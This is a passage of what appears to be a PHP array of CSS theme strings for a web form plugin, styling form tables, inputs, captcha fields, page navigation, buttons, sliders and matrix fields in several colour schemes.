!important;\nmargin-right:15px !important;\nfloat:none !important;\ncolor:#000000 !important;\n}\n.label\n{\nborder:none !important;\ncolor:#000000 !important;\nfont-weight:bold !important;\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.input_deactive\n{\ncolor:#999999 !important;\nfont-style:italic !important;\nborder:1px solid #000000 !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:4px !important;\nheight:16px;\n}\n.input_active\n{\ncolor:#000000 !important;\nfont-style:normal !important;\nborder:1px solid #000000 !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:4px !important;\nheight:16px;\n}\n.required\n{\nborder:none !important;\ncolor:red\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_black.png) !important;\n}\n.captcha_input\n{\nheight:20px !important;\nborder-radius:4px !important;\nborder:1px solid #000000 !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncolor:#000000 !important;\n}\n.file_upload\n{\nborder:1px solid #000000 !important;\nborder-radius:4px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncolor:#000000 !important;\n}    \n.page_deactive\n{\ncolor:#CCCCCC !important;\nborder:0px solid #000000 !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nborder-radius: 2px !important;\nbackground-color:#000000 !important;\n}\n.page_active\n{\ncolor:#000000 !important;\nborder:4px solid #000000 !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#CCCCCC !important;\nborder-radius: 9px !important;\nbox-shadow: 0px 0px 5px black !important;\n}\n.page_percentage_active\n{\npadding:0px !important;\nmargin:0px !important;\nborder-spacing: 0px !important;\nheight:30px !important;\nline-height:30px !important;\nbackground-color:#CCCCCC !important;\nborder-radius:20px !important;\nfont-size:15px !important;\nfloat:left !important;\ntext-align: center !important; \nbox-shadow: inset 0px 0px 10px #CCCCCC !important;\n}\n.page_percentage_deactive\n{\nheight:30px !important;\nline-height:30px !important;\nborder: 7px solid #CCCCCC !important;\nbackground-color:#000000 !important;\nborder-radius:30px !important;\ntext-align: left !important; \npadding:5px !important;\nleft: 20px !important;\nposition: relative !important;\n}\n.page_numbers\n{\nfont-size:11px !important;\ncolor:#ffffff !important;\nfont-weight:bold !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius:9px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#000 !important;\nborder: 2px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\n.button_reset\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius:9px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#000 !important;\nborder: 2px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\n.other_input\n{\nborder-radius:4px !important;\nborder:1px solid #000000 !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nmargin-left: 25px !important;\ncolor:#000000 !important;\n}\n#recaptcha_response_field\n{\nborder-radius:4px !important;\ncolor:#000000 !important;\n}\n.wdform_button button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius:9px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#000 !important;\nborder: 2px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\nbutton.wdform_page_button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius:9px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#000 !important;\nborder: 2px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\nspan.wdform_page_button\n{\ncolor:#ffffff !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\ncolor: white !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.wdform_page_navigation\n{\nmargin-right: 62px !important;\ntext-align:center !important;\nmargin-bottom:10px !important;\n}\n.wdform_percentage_text\n{\nmargin:3px 7px 3px 3px !important;\ncolor:#000 !important;\nfont-weight:bold !important;\n}\n.wdform_percentage_title\n{\ncolor:#ffffff !important;\nfont-style:italic !important;\nmargin: 0px 0px 0px 30px !important;\n}\n.wdform_map>div\n{\nborder:5px solid #000000 !important;\nborder-radius:7px !important;\n}\n.wdform_scale_rating table input\r\n{\r\nmargin:0 2px;\r\n}\r\n\r\n.wdform_scale_rating span\r\n{\r\ncolor:#770038;\r\nfont-weight:bold;\r\n}\r\n\r\n.wdform_grading .grading_div\r\n{\r\ncolor:#770038;\r\nfont-weight:bold;\r\n}\r\n\r\n.wdform_grading input\r\n{\r\nmargin:0 0 3px;\r\ncolor:#770038;\r\nbackground-color:#FFFFFF;\r\nborder-radius:4px;\r\nborder:1px solid #770038;\r\n}\r\n\r\n.wdform_grading label\r\n{\r\nfont-weight:bold;\r\n}\r\n\r\n.ui-slider-handle:hover, .ui-slider-handle:focus\r\n{\r\nbackground:#770038 !important;\r\nborder:1px solid #770038;\r\n}\r\n\r\n.ui-slider-handle, .ui-slider-range{\r\nbackground:#770038;\r\nborder:1px solid #770038;\r\n}\r\n\r\n.ui-slider-range\r\n{\r\nbackground:#FFFFFF;\r\n}\r\n\r\n.ui-slider\r\n{\r\nborder:1px solid #770038;\r\nbackground:none;\r\n}\r\n\r\n.ui-spinner-button:hover\r\n{\r\nbackground:#770038;\r\n}\r\n\r\n.ui-icon\r\n{\r\ncolor:#770038;\r\n}\r\n\r\n.ui-icon:hover\r\n{\r\ncolor:#F085AF;\r\n}\r\n\r\n.ui-spinner-input\r\n{\r\ncolor:#770038;\r\n}\r\n\r\n.ui-spinner\r\n{\r\nborder:1px solid #770038;\r\nmargin-right:3px !important;\r\n}\r\n\r\n.ui-spinner-button\r\n{\r\nborder-left:1px solid #770038;\r\n}\r\n\r\n.ui-spinner-input:focus\r\n{\r\noutline: none;\r\nborder:none !important;\r\n}\r\n\r\n.matrix_ \r\n{\r\npadding:4px 0;\r\n\r\n}\r\n\r\n.matrix_ label\r\n{\r\ncolor:#770038;\r\nfont-weight:bold;\r\n}\r\n\r\n.wdform_matrix table\r\n{\r\nborder-collapse: separate !important;\r\n\r\n}\r\n\r\n.wdform_matrix table td\r\n{\r\nborder-radius: 4px;\r\n}\r\n\r\n.wdform_matrix table tr:first-child td:first-child\r\n{\r\nborder:none;\r\n}\r\n\r\n.wdform_matrix table input, .wdform_matrix table select\r\n{\r\ncolor:#770038;\r\nbackground-color:#FFFFFF;\r\nborder:1px solid #770038;\r\nmargin:5px 7px;\r\nborder-radius: 4px;\r\npadding:1px;\r\n}\r\n\r\n.wdform_paypal_total\r\n{\r\ncolor:#770038;\r\n}",
      "37" => ".page_numbers {\nmargin-left: 10px;\n}\n .page_percentage_deactive,.page_percentage_deactive * {\nword-wrap: normal !important;\n-moz-box-sizing: content-box !important;\n-webkit-box-sizing: content-box !important;\nbox-sizing: content-box !important;\n}\n .wdform_td1 input {\n-webkit-box-sizing: content-box;\n-moz-box-sizing: content-box;\nbox-sizing: content-box;\n}\ntable {\n font-size: 12px !important;\n}\n.wdform_table1, .wdform_table1 table, .wdform_table1 tr, .wdform_table1 th{\n	padding-top:inherit !important;\n	padding-bottom:inherit !important;\n	vertical-align:middle;\n	margin:inherit !important;\n	line-height:1 !important;\n	border-collapse:separate !important;\n	padding-right:inherit;\n	padding-left:inherit;\n}\n.wdform_table1 img{\n	max-width:inherit !important;\n}\n.wdform_table1{\n	border-bottom:none;\n}\n.wdform_table1 table{\n	background-color:initial;\n}\nwdform_table2, .wdform_table2 table, .wdform_table2 tr, .wdform_table2 th{\n	width:inherit !important;\n	vertical-align:top !important;\n}\n.toolbar_padding hr{\n	margin-bottom:7px !important;\n	margin-top:7px !important;\n}\n.wdform_page_button{\n	max-width:inherit !important;\n}\n.wdform_table2 table{\n	border-width:inherit !important;\n}\ntable.wdform_table1, .wdform_table1 table{\n	border:0px !important;\n}\n.wdform_table2 td{\n	text-align:left;\n	border-width:inherit !important;\n}\n.wdform_table1 table, .wdform_table1 tbody{\n	border-collapse:separate !important;\n}\n.wdform_table1 td{\n	text-align:left;\n	border-collapse:separate !important;\n	line-height:1 !important;\n	border:0px none !important;\n	padding-bottom:2px;\n	padding-top:2px;\n	padding-left:inherit !important;\n	padding-right:inherit !important;\n	vertical-align:middle;\n	margin:inherit !important;\n}\n.wdform_table2 td{\n	vertical-align:top !important;\n}\n.wdform_table1 span{\n	vertical-align:top !important;\n}\n.label{\n	font-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\n	color:#ffffff !important;\n}\n.wdform_date{\n	width:100px !important;\n}\n.wdform_table1 input, .wdform_table1 textara{\n		color:#000;\n		-webkit-transition: all 0.0s linear;\n		line-height:1 !important;\n		font-size:inherit !important; \n		display:inline !important;\n		margin-top:inherit !important;\n		margin-bottom:inherit !important;\n		padding-top:inherit ;\n		padding-bottom:inherit;\n}\n.wdform_table1 select{\n	margin-bottom:inherit !important;\n	margin-top:inherit !important;\n	line-height:1 !important;\n		font-size:inherit !important; \n		height:inherit !important;\n		display:inline !important;\n}\n.wdform_table1 button{\n	padding:inherit !important;\n	line-height:1 !important;\n	background-image:none !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nwidth:100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:#000000 !important;\nborder:8px solid #F2281A !important;\ntext-align:center !important;\nborder-radius:27px !important;\nfloat:left !important;\nposition: relative !important;\nleft:40px !important;\n}\n.wdform_tr1\n{\nborder:8px solid #000000 !important;\nvertical-align:top !important;\nwidth:100% !important;\nborder-radius:20px !important;\ndisplay: table-cell !important;\nposition: relative !important;\nleft: -40px !important;\n}\n.wdform_td1\n{\nbackground-color: #F2281A !important;\nborder-radius: 10px !important;\n}\n.wdform_table2\n{\npadding-right:15px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 2px !important;\nborder-collapse:separate !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nwidth:100% !important;\n}\n.wdform_select select\n{\nborder-radius:6px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:2px solid #000000 !important;\ncolor:#000000 !important;\nopacity:0.99 !important;\n}\n.wdform_input input\n{\nborder-radius:4px !important;\nborder:2px solid #000000 !important;\npadding:1px !important;\nmargin:1px !important;\nheight:16px !important;\ncolor:#000000 !important;\n}\n.wdform_date_fields select\n{\ncolor:#000000 !important;\nborder-radius:4px !important;\nheight:21px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:2px solid #000000 !important;\nopacity:0.99 !important;\n}\n.am_pm_select\n{\ncolor:#000000 !important;\nborder-radius:4px !important;\nheight:20px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:2px solid #000000 !important;\nopacity:0.99 !important;\n}\n.wdform_date_fields input\n{\nborder-radius:4px !important;\nborder:2px solid #000000 !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\ncolor:#000000 !important;\n}\n.wdform_address input\n{\ncolor:#000000 !important;\nborder-radius:4px !important;\nborder:2px solid #000000 !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_date\n{\ncolor:#000000 !important;\nborder:2px solid #000000 !important;\nborder-radius:4px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_address select\n{\ncolor:#000000 !important;\nborder-radius:4px !important;\nheight:21px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:2px solid #000000 !important;\nopacity:0.99 !important;\n}\n.wdform_colon\n{\ncolor:#000000 !important;\n}\n.wdform_separator\n{\nvertical-align:middle !important;\ncolor:#000000 !important;\n}\n.wdform_line\n{\ncolor:#000000 !important;\n}\n.time_box\n{\ncolor:#000000 !important;\nborder-radius:4px !important;\nheight:16px !important;\nborder:2px solid #000000 !important;\npadding:1px !important;\nmargin:1px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle !important;\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#000000 !important;\nfont-weight: bold !important;\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\ncolor:#000000 !important;\n}\n.label\n{\nborder:none !important;\ncolor:#000000 !important;\nfont-weight:bold !important;\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.input_deactive\n{\ncolor:#999999 !important;\nfont-style:italic !important;\nborder:2px solid #000000 !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:4px !important;\nheight:16px;\n}\n.input_active\n{\ncolor:#000000 !important;\nfont-style:normal !important;\nborder:2px solid #000000 !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:4px !important;\nheight:16px;\n}\n.required\n{\nborder:none !important;\ncolor:blue\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_black.png) !important;\n}\n.captcha_input\n{\nheight:20px !important;\nborder-radius:4px !important;\nborder:2px solid #000000 !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncolor:#000000 !important;\n}\n.file_upload\n{\nborder:2px solid #000000 !important;\nborder-radius:4px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncolor:#000000 !important;\n}    \n.page_deactive\n{\ncolor:#F2281A !important;\nborder:0px solid #000000 !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nborder-radius: 2px !important;\nbackground-color:#000000 !important;\n}\n.page_active\n{\ncolor:#fff !important;\nborder:4px solid #000000 !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#fff !important;\nbackground-image: url([SITE_ROOT]/images/button6_4.png) !important;\nborder-radius: 9px !important;\nbox-shadow: 0px 0px 5px black !important;\n}\n.page_percentage_active\n{\npadding:0px !important;\nmargin:0px !important;\nborder-spacing: 0px !important;\nheight:30px !important;\nline-height:30px !important;\nbackground-color:#F2281A !important;\nbackground-image: url([SITE_ROOT]/images/button6_4.png) !important;\nborder-radius:20px !important;\nfont-size:15px !important;\nfloat:left !important;\ntext-align: center !important; \nbox-shadow: inset 0px 0px 10px #F2281A !important;\n}\n.page_percentage_deactive\n{\nheight:30px !important;\nline-height:30px !important;\nborder: 7px solid #F2281A !important;\nbackground-color:#000000 !important;\nborder-radius:30px !important;\ntext-align: left !important; \npadding:5px !important;\nleft: 20px !important;\nposition: relative !important;\n}\n.page_numbers\n{\nfont-size:11px !important;\ncolor:#ffffff !important;\nfont-weight:bold !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius:9px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-image: url([SITE_ROOT]/images/button6_4.png) !important;\nbackground-color:#000 !important;\nborder: 2px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\n.button_reset\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius:9px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-image: url([SITE_ROOT]/images/button6_4.png) !important;\nbackground-color:#000 !important;\nborder: 2px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\n.other_input\n{\nborder-radius:4px !important;\nborder:2px solid #000000 !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nmargin-left: 25px !important;\ncolor:#000000 !important;\n}\n#recaptcha_response_field\n{\nborder-radius:4px !important;\ncolor:#000000 !important;\n}\n.wdform_button button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius:9px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-image: url([SITE_ROOT]/images/button6_4.png) !important;\nbackground-color:#000 !important;\nborder: 2px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\nbutton.wdform_page_button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius:9px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-image: url([SITE_ROOT]/images/button6_4.png) !important;\nbackground-color:#000 !important;\nborder: 2px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\nspan.wdform_page_button\n{\ncolor:#ffffff !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\ncolor: white !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.wdform_page_navigation\n{\nmargin-right: 62px !important;\ntext-align:center !important;\nmargin-bottom:10px !important;\n}\n.wdform_percentage_text\n{\nmargin:3px 7px 3px 3px !important;\ncolor:#fff !important;\nfont-weight:bold !important;\n}\n.wdform_percentage_title\n{\ncolor:#ffffff !important;\nfont-style:italic !important;\nmargin: 0px 0px 0px 30px !important;\n}\n.wdform_map>div\n{\nborder:5px solid #000000 !important;\nborder-radius:7px !important;\n}\n.wdform_scale_rating table input\r\n{\r\nmargin:0 2px;\r\n}\r\n\r\n.wdform_scale_rating span\r\n{\r\nfont-weight:bold;\r\n}\r\n\r\n.wdform_grading input\r\n{\r\nmargin:0 0 3px;\r\ncolor:#000000;\r\nbackground-color:#FFFFFF;\r\nborder:1px solid #000000;\r\nborder-radius:4px;\r\npadding:0 4px;\r\n}\r\n\r\n.wdform_grading label, .wdform_grading .grading_div\r\n{\r\nfont-weight:bold;\r\n}\r\n\r\n.ui-slider-handle:hover, .ui-slider-handle:focus\r\n{\r\nbackground:#000000 !important;\r\nborder:1px solid #000000;\r\n}\r\n\r\n.ui-slider-handle{\r\nbackground:#000000;\r\nborder:1px solid #000000;\r\n}\r\n\r\n.ui-slider-range\r\n{\r\nbackground:#FFFFFF;\r\n}\r\n\r\n.ui-slider\r\n{\r\nborder:1px solid #000000;\r\nbackground:none;\r\n}\r\n\r\n.ui-spinner-button:hover\r\n{\r\nbackground:#000000;\r\n}\r\n\r\n.ui-icon\r\n{\r\ncolor:#000000;\r\n}\r\n\r\n.ui-icon:hover\r\n{\r\ncolor:#CCCCCC;\r\n}\r\n\r\n.ui-spinner-input\r\n{\r\ncolor:#000000;\r\n}\r\n\r\n.ui-spinner\r\n{\r\nborder:1px solid #000000;\r\nmargin-right:3px !important;\r\n}\r\n\r\n.ui-spinner-button\r\n{\r\nborder-left:1px solid #000000;\r\n}\r\n\r\n.ui-spinner-input:focus\r\n{\r\noutline: none;\r\nborder:none !important;\r\n}\r\n\r\n.matrix_ \r\n{\r\npadding:4px 0;\r\n\r\n}\r\n\r\n.matrix_ label\r\n{\r\ncolor:#000000;\r\nfont-weight:bold;\r\n}\r\n\r\n.wdform_matrix table\r\n{\r\nborder-collapse: separate !important;\r\n\r\n}\r\n\r\n.wdform_matrix table td\r\n{\r\nborder-radius: 4px;\r\n}\r\n\r\n.wdform_matrix table tr:first-child td:first-child\r\n{\r\nborder:none;\r\n}\r\n\r\n.wdform_matrix table input, .wdform_matrix table select\r\n{\r\ncolor:#000000;\r\nbackground-color:#FFFFFF;\r\nborder:1px solid #000000;\r\nmargin:5px 7px;\r\nborder-radius: 4px;\r\npadding:1px;\r\n}",
      "38" => ".page_numbers {\nmargin-left: 10px;\n}\n .page_percentage_deactive,.page_percentage_deactive * {\nword-wrap: normal !important;\n-moz-box-sizing: content-box !important;\n-webkit-box-sizing: content-box !important;\nbox-sizing: content-box !important;\n}\n .wdform_td1 input {\n-webkit-box-sizing: content-box;\n-moz-box-sizing: content-box;\nbox-sizing: content-box;\n}\ntable {\n font-size: 12px !important;\n}\n.wdform_table1, .wdform_table1 table, .wdform_table1 tr, .wdform_table1 th{\n	padding-top:inherit !important;\n	padding-bottom:inherit !important;\n	vertical-align:middle;\n	margin:inherit !important;\n	line-height:1 !important;\n	border-collapse:separate !important;\n	padding-right:inherit;\n	padding-left:inherit;\n}\n.wdform_table1 img{\n	max-width:inherit !important;\n}\n.wdform_table1{\n	border-bottom:none;\n}\n.wdform_table1 table{\n	background-color:initial;\n}\nwdform_table2, .wdform_table2 table, .wdform_table2 tr, .wdform_table2 th{\n	width:inherit !important;\n	vertical-align:top !important;\n}\n.toolbar_padding hr{\n	margin-bottom:7px !important;\n	margin-top:7px !important;\n}\n.wdform_page_button{\n	max-width:inherit !important;\n}\n.wdform_table2 table{\n	border-width:inherit !important;\n}\ntable.wdform_table1, .wdform_table1 table{\n	border:0px !important;\n}\n.wdform_table2 td{\n	text-align:left;\n	border-width:inherit !important;\n}\n.wdform_table1 table, .wdform_table1 tbody{\n	border-collapse:separate !important;\n}\n.wdform_table1 td{\n	text-align:left;\n	border-collapse:separate !important;\n	line-height:1 !important;\n	border:0px none !important;\n	padding-bottom:2px;\n	padding-top:2px;\n	padding-left:inherit !important;\n	padding-right:inherit !important;\n	vertical-align:middle;\n	margin:inherit !important;\n}\n.wdform_table2 td{\n	vertical-align:top !important;\n}\n.wdform_table1 span{\n	vertical-align:top !important;\n}\n.label{\n	font-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\n	color:#ffffff !important;\n}\n.wdform_date{\n	width:100px !important;\n}\n.wdform_table1 input, .wdform_table1 textara{\n		color:#000;\n		-webkit-transition: all 0.0s linear;\n		line-height:1 !important;\n		font-size:inherit !important; \n		display:inline !important;\n		margin-top:inherit !important;\n		margin-bottom:inherit !important;\n		padding-top:inherit ;\n		padding-bottom:inherit;\n}\n.wdform_table1 select{\n	margin-bottom:inherit !important;\n	margin-top:inherit !important;\n	line-height:1 !important;\n		font-size:inherit !important; \n		height:inherit !important;\n		display:inline !important;\n}\n.wdform_table1 button{\n	padding:inherit !important;\n	line-height:1 !important;\n	background-image:none !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nwidth:100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:#0090E3 !important;\nborder:8px solid #FF944C !important;\ntext-align:center !important;\nborder-radius:27px !important;\nfloat:left !important;\nposition: relative !important;\nleft:40px !important;\n}\n.wdform_tr1\n{\nborder:8px solid #0090E3 !important;\nvertical-align:top !important;\nwidth:100% !important;\nborder-radius:20px !important;\ndisplay: table-cell !important;\nposition: relative !important;\nleft: -40px !important;\n}\n.wdform_td1\n{\nbackground-color: #FF944C !important;\nborder-radius: 10px !important;\n}\n.wdform_table2\n{\npadding-right:15px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 2px !important;\nborder-collapse:separate !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nwidth:100% !important;\n}\n.wdform_select select\n{\nborder-radius:6px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:1px solid #0090E3 !important;\ncolor:#000 !important;\n}\n.wdform_input input\n{\nborder-radius:4px !important;\nborder:1px solid #0090E3 !important;\npadding:1px !important;\nmargin:1px !important;\nheight:16px !important;\ncolor:#000 !important;\n}\n.wdform_date_fields select\n{\ncolor:#000 !important;\nborder-radius:4px !important;\nheight:21px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:1px solid #0090E3 !important;\n}\n.am_pm_select\n{\ncolor:#000 !important;\nborder-radius:4px !important;\nheight:20px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:1px solid #0090E3 !important;\n}\n.wdform_date_fields input\n{\nborder-radius:4px !important;\nborder:1px solid #0090E3 !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\ncolor:#000 !important;\n}\n.wdform_address input\n{\ncolor:#000 !important;\nborder-radius:4px !important;\nborder:1px solid #0090E3 !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_date\n{\ncolor:#000 !important;\nborder:1px solid #0090E3 !important;\nborder-radius:4px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_address select\n{\ncolor:#000 !important;\nborder-radius:4px !important;\nheight:21px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:1px solid #0090E3 !important;\n}\n.wdform_colon\n{\ncolor:#000 !important;\n}\n.wdform_separator\n{\nvertical-align:middle !important;\ncolor:#000 !important;\n}\n.wdform_line\n{\ncolor:#000 !important;\n}\n.time_box\n{\ncolor:#000 !important;\nborder-radius:4px !important;\nheight:16px !important;\nborder:1px solid #0090E3 !important;\npadding:1px !important;\nmargin:1px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle !important;\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#000 !important;\nfont-weight: bold !important;\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\ncolor:#000 !important;\n}\n.label\n{\nborder:none !important;\ncolor:#000 !important;\nfont-weight:bold !important;\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.input_deactive\n{\ncolor:#999999 !important;\nfont-style:italic !important;\nborder:1px solid #0090E3 !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:4px !important;\nheight:16px;\n}\n.input_active\n{\ncolor:#000 !important;\nfont-style:normal !important;\nborder:1px solid #0090E3 !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:4px !important;\nheight:16px;\n}\n.required\n{\nborder:none !important;\ncolor:red\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_black.png) !important;\n}\n.captcha_input\n{\nheight:20px !important;\nborder-radius:4px !important;\nborder:1px solid #0090E3 !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncolor:#000 !important;\n}\n.file_upload\n{\nborder:1px solid #0090E3 !important;\nborder-radius:4px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncolor:#000 !important;\n}    \n.page_deactive\n{\ncolor:#FF944C !important;\nborder:0px solid #000000 !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nborder-radius: 2px !important;\nbackground-color:#0090E3 !important;\n}\n.page_active\n{\ncolor:#0090E3 !important;\nborder:4px solid #0090E3 !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#FF944C !important;\nborder-radius: 9px !important;\nbox-shadow: 0px 0px 5px black !important;\n}\n.page_percentage_active\n{\npadding:0px !important;\nmargin:0px !important;\nborder-spacing: 0px !important;\nheight:30px !important;\nline-height:30px !important;\nbackground-color:#FF944C !important;\nborder-radius:20px !important;\nfont-size:15px !important;\nfloat:left !important;\ntext-align: center !important; \nbox-shadow: inset 0px 0px 10px #FF944C !important;\n}\n.page_percentage_deactive\n{\nheight:30px !important;\nline-height:30px !important;\nborder: 7px solid #FF944C !important;\nbackground-color:#0090E3 !important;\nborder-radius:30px !important;\ntext-align: left !important; \npadding:5px !important;\nleft: 20px !important;\nposition: relative !important;\n}\n.page_numbers\n{\nfont-size:11px !important;\ncolor:#ffffff !important;\nfont-weight:bold !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius:9px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#0090E3 !important;\nborder: 2px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\n.button_reset\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius:9px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#0090E3 !important;\nborder: 2px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\n.other_input\n{\nborder-radius:4px !important;\nborder:1px solid #0090E3 